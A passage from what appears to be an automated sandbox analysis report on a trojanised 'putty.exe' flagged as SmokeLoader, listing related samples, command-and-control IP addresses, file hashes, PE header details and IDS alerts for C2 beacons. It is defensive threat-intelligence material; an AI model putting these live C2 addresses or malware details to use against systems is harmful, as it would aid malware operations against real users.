                                            constractionscity1991.lat#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            restructurisationservice.ru#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            connecticutproperty.ru#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 109.70.26.37
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 194.85.61.76
                                            #U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                            • 109.70.26.37
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 109.70.26.37
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                            • 109.70.26.37

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            RU-CENTERRU#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 109.70.26.37
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 194.85.61.76
                                            #U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                            • 109.70.26.37
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 109.70.26.37
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                            • 109.70.26.37
                                            TRC.m68k.elfGet hashmaliciousMiraiBrowse
                                            • 193.232.244.238
                                            W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • 109.70.26.37
                                            Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • 194.85.61.76
                                            PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                            • 194.85.61.76
                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                            • 194.85.61.76
                                            NET1-ASBG#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            a-r.m-5.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 93.123.85.8
                                            s-h.4-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 93.123.85.8
                                            x-3.2-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 93.123.85.8
                                            a-r.m-7.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 93.123.85.8
                                            i-5.8-6.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 93.123.85.8

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Roaming\hajefwb

                                            Download File
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):245760
                                            Entropy (8bit):5.638844672935597
                                            Encrypted:false
                                            SSDEEP:3072:VC2pwqpX3QufagAKaKkWvqMFh1KjP40ZZ6s5dM6Y273v9blsf:I4wqpX3qgAKaIvqRjBZVM/y
                                            MD5:3BBAC642557B0AB934ADDBAC0594561C
                                            SHA1:0787A06F1FFF51BDFDB129186DF44E73D8C7D5DE
                                            SHA-256:BC887FCD6805824AC58A107917C6D083056D688EEF39E979DA25D16EB388E798
                                            SHA-512:C91CBC77B3A67F65082F5D8187F237B9DE0A6AAF1CBFB7BBD0E3157D2B8815F55A6ED71D6BDA88941DAED67AD6F0EE9A9E98149F11B053F81A462E17F7145730
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 47%
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B.AK#..K#..K#...lK.J#..UqY.U#..UqH._#..Uq^.%#..l..N#..K#..>#..UqW.J#..UqI.J#..UqL.J#..RichK#..................PE..L...F.&f.....................>?.............. ....@..........................PA.....:e.......................................8..<....0@.............................................................................. ...............................text............................... ..`.rdata..*"... ...$..................@..@.data...<.=..P...p...6..............@....rsrc........0@.....................@..@................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Roaming\hajefwb:Zone.Identifier

                                            Download File
                                            Process:C:\Windows\explorer.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:[ZoneTransfer]....ZoneId=0

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):5.638844672935597
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:putty.exe
                                            File size:245'760 bytes
                                            MD5:3bbac642557b0ab934addbac0594561c
                                            SHA1:0787a06f1fff51bdfdb129186df44e73d8c7d5de
                                            SHA256:bc887fcd6805824ac58a107917c6d083056d688eef39e979da25d16eb388e798
                                            SHA512:c91cbc77b3a67f65082f5d8187f237b9de0a6aaf1cbfb7bbd0e3157d2b8815f55a6ed71d6bda88941daed67ad6f0ee9a9e98149f11b053f81a462e17f7145730
                                            SSDEEP:3072:VC2pwqpX3QufagAKaKkWvqMFh1KjP40ZZ6s5dM6Y273v9blsf:I4wqpX3qgAKaIvqRjBZVM/y
                                            TLSH:08347C1336F1E067E7B78A3079FCD6B02A3BB87B9B74814E1224279F19712908A5D753
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B.AK#..K#..K#...lK.J#..UqY.U#..UqH._#..Uq^.%#..l...N#..K#..>#..UqW.J#..UqI.J#..UqL.J#..RichK#..................PE..L...F.&f...

                                            File Icon

                                            Icon Hash:151a131010911409

                                            Static PE Info

                                            General

                                            Entrypoint:0x401a92
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x6626F246 [Mon Apr 22 23:27:02 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:0
                                            File Version Major:5
                                            File Version Minor:0
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:0
                                            Import Hash:d4d3ffca50bc999994f856732f42114f

                                            Entrypoint Preview

                                            Instruction
                                            call 00007FEB2CDA73F9h
                                            jmp 00007FEB2CDA371Dh
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 00000328h
                                            mov dword ptr [00427C38h], eax
                                            mov dword ptr [00427C34h], ecx
                                            mov dword ptr [00427C30h], edx
                                            mov dword ptr [00427C2Ch], ebx
                                            mov dword ptr [00427C28h], esi
                                            mov dword ptr [00427C24h], edi
                                            mov word ptr [00427C50h], ss
                                            mov word ptr [00427C44h], cs
                                            mov word ptr [00427C20h], ds
                                            mov word ptr [00427C1Ch], es
                                            mov word ptr [00427C18h], fs
                                            mov word ptr [00427C14h], gs
                                            pushfd
                                            pop dword ptr [00427C48h]
                                            mov eax, dword ptr [ebp+00h]
                                            mov dword ptr [00427C3Ch], eax
                                            mov eax, dword ptr [ebp+04h]
                                            mov dword ptr [00427C40h], eax
                                            lea eax, dword ptr [ebp+08h]
                                            mov dword ptr [00427C4Ch], eax
                                            mov eax, dword ptr [ebp-00000320h]
                                            mov dword ptr [00427B88h], 00010001h
                                            mov eax, dword ptr [00427C40h]
                                            mov dword ptr [00427B3Ch], eax
                                            mov dword ptr [00427B30h], C0000409h
                                            mov dword ptr [00427B34h], 00000001h
                                            mov eax, dword ptr [00425004h]
                                            mov dword ptr [ebp-00000328h], eax
                                            mov eax, dword ptr [00425008h]
                                            mov dword ptr [ebp-00000324h], eax
                                            call dword ptr [000000C8h]

                                            Rich Headers

                                            Programming Language:
                                            • [C++] VS2008 build 21022
                                            • [ASM] VS2008 build 21022
                                            • [ C ] VS2008 build 21022
                                            • [IMP] VS2005 build 50727
                                            • [RES] VS2008 build 21022
                                            • [LNK] VS2008 build 21022

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x238fc0x3c.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x4030000x119b0.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x220000x198.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x20dbc0x20e005c541c616f9b306ff42b3e4f234151f9False0.6227423954372624data6.440374416875712IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x220000x222a0x24007532422a3849ad26f5d656584a69be00False0.3527560763888889data5.379872759729207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x250000x3dd13c0x7000c5455776ba3d819123800dd3a4929859unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x4030000x119b00x11a002db4edf44b4628cb44c7dd6130a95d88False0.44549257535460995data4.756112777224745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x4035e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.511727078891258
                                            RT_ICON0x4044880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.5631768953068592
                                            RT_ICON0x404d300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.6002304147465438
                                            RT_ICON0x4053f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.630057803468208
                                            RT_ICON0x4059600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.4050829875518672
                                            RT_ICON0x407f080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.4732645403377111
                                            RT_ICON0x408fb00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.4692622950819672
                                            RT_ICON0x4099380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.5709219858156028
                                            RT_ICON0x409e180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkmenTurkmenistan0.3443496801705757
                                            RT_ICON0x40acc00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkmenTurkmenistan0.46796028880866425
                                            RT_ICON0x40b5680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkmenTurkmenistan0.5028801843317973
                                            RT_ICON0x40bc300x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkmenTurkmenistan0.5245664739884393
                                            RT_ICON0x40c1980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkmenTurkmenistan0.4254149377593361
                                            RT_ICON0x40e7400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkmenTurkmenistan0.4329268292682927
                                            RT_ICON0x40f7e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkmenTurkmenistan0.4364754098360656
                                            RT_ICON0x4101700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkmenTurkmenistan0.4512411347517731
                                            RT_STRING0x4108080x4eedata0.43898573692551507
                                            RT_STRING0x410cf80xeedata0.5546218487394958
                                            RT_STRING0x410de80x6d6data0.42857142857142855
                                            RT_STRING0x4114c00x748data0.4248927038626609
                                            RT_STRING0x411c080x830data0.4193702290076336
                                            RT_STRING0x4124380x712data0.4298342541436464
                                            RT_STRING0x412b500x78adata0.4202072538860104
                                            RT_STRING0x4132e00x754data0.4211087420042644
                                            RT_STRING0x413a380x914data0.41179001721170394
                                            RT_STRING0x4143500x65edata0.4306748466257669
                                            RT_GROUP_ICON0x4105d80x76dataTurkmenTurkmenistan0.6694915254237288
                                            RT_GROUP_ICON0x409da00x76dataTurkmenTurkmenistan0.6610169491525424
                                            RT_VERSION0x4106500x1b4data0.5688073394495413

                                            Imports

                                            DLLImport
                                            KERNEL32.dllGetComputerNameA, SetDefaultCommConfigA, SetLocaleInfoA, SetErrorMode, WriteConsoleOutputW, DeleteVolumeMountPointA, InterlockedIncrement, InterlockedDecrement, ReadConsoleOutputAttribute, GetEnvironmentStringsW, GetTimeFormatA, GetModuleHandleW, GetDateFormatA, GetCommandLineA, SetProcessPriorityBoost, LoadLibraryW, GetConsoleAliasW, DisconnectNamedPipe, GetStartupInfoA, SetLastError, GetProcAddress, SearchPathA, SetFileAttributesA, GetNumaHighestNodeNumber, ResetEvent, GetAtomNameA, LoadLibraryA, LocalAlloc, GetFileType, AddAtomW, AddAtomA, FoldStringA, GetModuleHandleA, OpenFileMappingW, BuildCommDCBA, GetShortPathNameW, Module32Next, EndUpdateResourceA, GetVersionExA, FindFirstVolumeW, UnregisterWaitEx, GetLastError, HeapFree, HeapAlloc, MultiByteToWideChar, HeapReAlloc, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetHandleCount, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, ReadFile, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA
                                            USER32.dllGetProcessDefaultLayout

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            TurkmenTurkmenistan

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-12-19T10:58:12.359414+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54973594.156.177.5180TCP
                                            2024-12-19T10:58:14.531297+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54974194.156.177.5180TCP
                                            2024-12-19T10:58:14.531297+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.54974194.156.177.5180TCP
                                            2024-12-19T10:58:16.781269+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549747194.85.61.7680TCP
                                            2024-12-19T10:59:22.905776+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54989794.156.177.5180TCP
                                            2024-12-19T10:59:24.608903+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54990294.156.177.5180TCP
                                            2024-12-19T10:59:24.608903+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.54990294.156.177.5180TCP
                                            2024-12-19T10:59:26.108877+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549908194.85.61.7680TCP
                                            2024-12-19T10:59:27.827648+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54991494.156.177.5180TCP
                                            2024-12-19T10:59:29.405803+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54991594.156.177.5180TCP
                                            2024-12-19T10:59:30.843229+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549920194.85.61.7680TCP
                                            2024-12-19T10:59:30.843229+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.549920194.85.61.7680TCP
                                            2024-12-19T10:59:32.436950+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54992694.156.177.5180TCP
                                            2024-12-19T10:59:33.936950+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54992894.156.177.5180TCP
                                            2024-12-19T10:59:33.936950+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.54992894.156.177.5180TCP
                                            2024-12-19T10:59:35.406095+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549933194.85.61.7680TCP
                                            2024-12-19T10:59:35.406095+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.549933194.85.61.7680TCP
                                            2024-12-19T10:59:37.327557+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54993994.156.177.5180TCP
                                            2024-12-19T10:59:38.769169+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54994294.156.177.5180TCP
                                            2024-12-19T10:59:38.769169+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.54994294.156.177.5180TCP
                                            2024-12-19T10:59:40.327545+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549947194.85.61.7680TCP
                                            2024-12-19T10:59:40.327545+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.549947194.85.61.7680TCP
                                            2024-12-19T10:59:42.608756+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54995394.156.177.5180TCP
                                            2024-12-19T10:59:44.093134+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54995894.156.177.5180TCP
                                            2024-12-19T10:59:45.593136+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549964194.85.61.7680TCP
                                            2024-12-19T10:59:48.139987+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54997094.156.177.5180TCP
                                            2024-12-19T10:59:49.530677+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54997394.156.177.5180TCP
                                            2024-12-19T10:59:50.905589+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549977194.85.61.7680TCP
                                            2024-12-19T10:59:56.702432+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54999394.156.177.5180TCP
                                            2024-12-19T10:59:58.202555+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54999594.156.177.5180TCP
                                            2024-12-19T10:59:58.202555+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.54999594.156.177.5180TCP
                                            2024-12-19T10:59:59.640179+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550000194.85.61.7680TCP
                                            2024-12-19T10:59:59.640179+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.550000194.85.61.7680TCP
                                            2024-12-19T11:00:06.342983+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55000194.156.177.5180TCP
                                            2024-12-19T11:00:07.905516+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55000294.156.177.5180TCP
                                            2024-12-19T11:00:09.405517+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550003194.85.61.7680TCP
                                            2024-12-19T11:00:15.530466+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55000494.156.177.5180TCP
                                            2024-12-19T11:00:15.530466+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.55000494.156.177.5180TCP
                                            2024-12-19T11:00:17.108580+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55000594.156.177.5180TCP
                                            2024-12-19T11:00:18.608576+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550006194.85.61.7680TCP
                                            2024-12-19T11:00:23.702267+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55000794.156.177.5180TCP
                                            2024-12-19T11:00:25.139893+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55000894.156.177.5180TCP
                                            2024-12-19T11:00:25.139893+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.55000894.156.177.5180TCP
                                            2024-12-19T11:00:26.639752+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550009194.85.61.7680TCP
                                            2024-12-19T11:00:26.639752+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.550009194.85.61.7680TCP
                                            2024-12-19T11:00:31.936600+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55001094.156.177.5180TCP
                                            2024-12-19T11:00:33.608454+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55001194.156.177.5180TCP
                                            2024-12-19T11:00:33.608454+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.55001194.156.177.5180TCP
                                            2024-12-19T11:00:35.030325+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550012194.85.61.7680TCP
                                            2024-12-19T11:00:40.639665+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55001394.156.177.5180TCP
                                            2024-12-19T11:00:42.092793+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55001494.156.177.5180TCP
                                            2024-12-19T11:00:43.608439+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550015194.85.61.7680TCP
                                            2024-12-19T11:00:49.327252+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55001694.156.177.5180TCP
                                            2024-12-19T11:00:50.795846+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55001794.156.177.5180TCP
                                            2024-12-19T11:00:52.295850+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550018194.85.61.7680TCP
                                            2024-12-19T11:00:58.217739+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55001994.156.177.5180TCP
                                            2024-12-19T11:00:58.217739+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.55001994.156.177.5180TCP
                                            2024-12-19T11:00:59.702081+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55002094.156.177.5180TCP
                                            2024-12-19T11:01:01.311427+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550021194.85.61.7680TCP
                                            2024-12-19T11:01:01.311427+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.550021194.85.61.7680TCP
                                            2024-12-19T11:01:06.592651+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55002294.156.177.5180TCP
                                            2024-12-19T11:01:06.592651+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.55002294.156.177.5180TCP
                                            2024-12-19T11:01:08.139529+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55002394.156.177.5180TCP
                                            2024-12-19T11:01:08.139529+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.55002394.156.177.5180TCP
                                            2024-12-19T11:01:09.639518+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550024194.85.61.7680TCP
                                            2024-12-19T11:01:09.639518+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.550024194.85.61.7680TCP
                                            2024-12-19T11:01:15.639488+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55002594.156.177.5180TCP
                                            2024-12-19T11:01:17.108246+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55002694.156.177.5180TCP
                                            2024-12-19T11:01:18.608254+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550027194.85.61.7680TCP
                                            2024-12-19T11:01:24.327004+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55002894.156.177.5180TCP
